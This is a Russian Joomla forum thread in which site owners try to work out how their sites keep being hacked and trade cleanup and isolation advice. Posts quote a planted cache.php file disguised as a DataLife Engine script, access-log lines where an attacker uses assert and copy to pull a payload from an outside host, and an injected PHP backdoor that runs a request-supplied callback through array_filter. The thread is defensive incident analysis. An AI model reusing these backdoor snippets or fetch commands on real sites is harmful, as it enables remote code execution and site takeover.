Как понять в чем уязвимость сайта?

  • 17 Ответов
  • 1864 Просмотров

0 Пользователей и 1 Гость просматривают эту тему.

*

Оффлайн mak200

Добрый день!
Ищу решение.
Идут регулярные взломы сайта.

Сайт обновляется вовремя.
Пароли сложные, после каждого взлома меняются.
Компьютер с которого работает FTP-клиент проверен на вирусы.
Да и поддержка сказала, что взлом НЕ через FTP или shel.
Все папки имеют права 755, файлы 644.
На сервере сайт не единственный, но взлом происходит через этот, насколько могу судить.

На сайте появляется скрипт cache.php.
[spoiler]
Цитировать
<?php
/*
=====================================================
 DataLife Engine - by SoftNews Media Group
-----------------------------------------------------
 http://dle-news.ru/
-----------------------------------------------------
 Copyright (c) 2004,2014 SoftNews Media Group
=====================================================
 DataLife CACHE ENGINE
=====================================================
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright Р’В© 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.
*/
error_reporting(E_ALL);
ini_set("display_errors", 0);
ignore_user_abort(true);

$files = scandir($_SERVER['DOCUMENT_ROOT']);
for ($i=0;$i<count($files);$i++) {
  if(stristr($files[$i], 'php')) {
      $time = filemtime($_SERVER['DOCUMENT_ROOT']."/".$files[$i]);
      break;
  }
 }
 
touch($_SERVER['SCRIPT_FILENAME'], $time);   
chmod(__FILE__, 0555);
[/spoiler]

Через него происходит заражение других php файлов.
По времени заражения нашел в логе 4 строчки.
[spoiler]
Цитировать
52.41.22.110 - - [06/Jun/2016:01:15:24 +0300] "POST http://automatika-liv.ru/ HTTP/1.1" 200 4 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
52.41.22.110 - - [06/Jun/2016:01:15:25 +0300] "GET http://automatika-liv.ru/?param1=assert&param2=copy(%22http://getitsed.net/s.txt%22,%22cache.php%22); HTTP/1.1" 200 6120 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
52.41.22.110 - - [06/Jun/2016:01:15:26 +0300] "GET http://automatika-liv.ru/?cmd=copy(%22http%3A%2F%2Fgetitsed.net%2Fs.txt%22%2C%20%22cache.php%22)%3B HTTP/1.1" 200 6120 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
52.41.22.110 - - [06/Jun/2016:01:15:27 +0300] "GET http://automatika-liv.ru/cache.php HTTP/1.1" 200 17 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
[/spoiler]

Кто-то может подсказать в чем уязвимость?

*

Оффлайн draff

  • *******
  • 2820
  • [+]174 / [-]5
  • Пол: Мужской
  • step by step
    • Просмотр профиля
Re: Как понять в чем уязвимость сайта?
« Ответ #1 : 08.06.2016, 20:48:54 »
Я бы не был так уверен, что взлом именно через Joomla .
Что мешает завести отдельный аккаунт для Joomla и тогда уже как бы карантин точно
Из расширений защиты что установлено ? RSFirewall установите

*

Оффлайн mak200

Re: Как понять в чем уязвимость сайта?
« Ответ #2 : 08.06.2016, 21:12:36 »
Никаких расширений безопасности не установлено.
Второй сайт на аккаунте тоже Joomla.

Есть мысли по поводу строк из лог-файла?

*

Оффлайн winstrool

  • ******
  • 802
  • [+]41 / [-]2
  • Пол: Мужской
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Re: Как понять в чем уязвимость сайта?
« Ответ #3 : 08.06.2016, 21:26:02 »
Никаких расширений безопасности не установлено.
Второй сайт на аккаунте тоже Joomla.

Есть мысли по поводу строк из лог-файла?
Сначала почистите сайт, наведите профилактические меры безопасности и поставте снифер для отловли не GET запросов, там все и прояснится, взломщик полюбому будет пытаться востановить доступ, вот там и выявите уязвимый участок кода.
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Оффлайн mak200

Re: Как понять в чем уязвимость сайта?
« Ответ #4 : 08.06.2016, 21:37:29 »
Сначала почистите сайт,

Это сделал.

наведите профилактические меры безопасности

Что имеется в виду?
Мне кажется, что уже все сделал что знал.

и поставте снифер для отловли не GET запросов

Это что такое, расширение какое-то? Первый раз слышу.

*

Оффлайн winstrool

  • ******
  • 802
  • [+]41 / [-]2
  • Пол: Мужской
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Re: Как понять в чем уязвимость сайта?
« Ответ #5 : 08.06.2016, 23:14:16 »
Это что такое, расширение какое-то? Первый раз слышу.
Это такой самописный скрипт, который прогружается поверх всех скриптов и ведет свой лог, как общий пример для ознакомления https://forum.antichat.ru/threads/404932/
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Оффлайн voland

  • ********
  • 9939
  • [+]520 / [-]101
  • Пол: Мужской
  • СКАЙП утерян! Пишите в телеграм @volandku
    • Просмотр профиля
    • webstudio.pro
Re: Как понять в чем уязвимость сайта?
« Ответ #6 : 08.06.2016, 23:23:22 »
А где ж версии и что стоит?

Re: Как понять в чем уязвимость сайта?
« Ответ #7 : 08.06.2016, 23:29:04 »
Это такой самописный скрипт, который прогружается поверх всех скриптов и ведет свой лог, как общий пример для ознакомления https://forum.antichat.ru/threads/404932/
Круто!
Ставь лайк, если согласен, и делай репост!

  => мои публикации
    => мои работы
      => спектр моих услуг

Re: Как понять в чем уязвимость сайта?
« Ответ #8 : 08.06.2016, 23:31:56 »
Надо добавить, что сам по себе сниффер бесполезен. А вот если к его логам fail2ban подключить, то это будет очень мощная штука - попытался сделать инъекцию - получил бан!
Ставь лайк, если согласен, и делай репост!

  => мои публикации
    => мои работы
      => спектр моих услуг


*

Оффлайн winstrool

  • ******
  • 802
  • [+]41 / [-]2
  • Пол: Мужской
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Re: Как понять в чем уязвимость сайта?
« Ответ #10 : 09.06.2016, 00:49:24 »
Надо добавить, что сам по себе сниффер бесполезен. А вот если к его логам fail2ban подключить, то это будет очень мощная штука - попытался сделать инъекцию - получил бан!
Не всегда баном можно защетиться, а вот найти багу и закрыть ее, вот это дело!
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Оффлайн mak200

Re: Как понять в чем уязвимость сайта?
« Ответ #11 : 09.06.2016, 02:10:34 »
Joomla!, 3.5.1.
Обновлял до взлома, точно не помню.

Завтра думаю воспроизвести локально свою кмс, со всеми расширениями.
И затем сравнить с сервером на различия файлов.

*

Оффлайн finkel

Re: Как понять в чем уязвимость сайта?
« Ответ #12 : 28.06.2016, 02:19:12 »
Как успехи? у меня тоже самое на джумлосайте, я обнаружил еще обработку get параметров

Цитировать
IF ($_REQUEST['param1'] && $_REQUEST['param2']) { $f = $_REQUEST['param1']; $p = array( $_REQUEST['param2'); $fp = array_filter($p, $f); echo 'OK'; exit;}

сache.php заливают через это, $f - callback, $p - параметр, но как это попало на сайт, я понять не могу.

*

Оффлайн winstrool

  • ******
  • 802
  • [+]41 / [-]2
  • Пол: Мужской
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Re: Как понять в чем уязвимость сайта?
« Ответ #13 : 28.06.2016, 13:57:21 »
Как успехи? у меня тоже самое на джумлосайте, я обнаружил еще обработку get параметров

сache.php заливают через это, $f - callback, $p - параметр, но как это попало на сайт, я понять не могу.
Поподает по средствам взлома, ищите, лечите, устраняйте проблему...

P.S: Тоже интересно, чем дело закончилось у ТС...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Оффлайн finkel

Re: Как понять в чем уязвимость сайта?
« Ответ #14 : 28.06.2016, 18:48:48 »
Поподает по средствам взлома, ищите, лечите, устраняйте проблему...

P.S: Тоже интересно, чем дело закончилось у ТС...

Обновили сайтики и выпилили все бекдоры, ждем.
Самое интересное это как через один сайт все заразили.


*

Оффлайн Ragivort

  • ******
  • 1045
  • [+]51 / [-]2
  • Пол: Мужской
  • Есть мечта-стоит жить
    • Просмотр профиля
    • IT Premium
Re: Как понять в чем уязвимость сайта?
« Ответ #16 : 05.07.2016, 14:41:49 »
 
Ну вы их хоть разделили? Чтобы опять такого не было.
Оффтоп мб, но что имеется в виду? Если у меня на VPS много сайтов, их как-то можно разделить? По юзерам? Чтобы они не были в одной папке
Дозволь мне свершить то добро, которое я способен свершить, теперь, ибо я могу более не вернуться сюда.

*

Оффлайн flyingspook

Re: Как понять в чем уязвимость сайта?
« Ответ #17 : 05.07.2016, 16:46:09 »
Оффтоп мб, но что имеется в виду? Если у меня на VPS много сайтов, их как-то можно разделить? По юзерам? Чтобы они не были в одной папке
Создать отдельного пользователя для каждого сайта, один сайт один пользователь с бд, ftp и прочими доступами. Это самое простое разделение. кол-по пользователей = кол-ву сайтов ну и root (root-а использовать только для настроек vps) и работы вести с каждым сайтом только от имени его пользователя.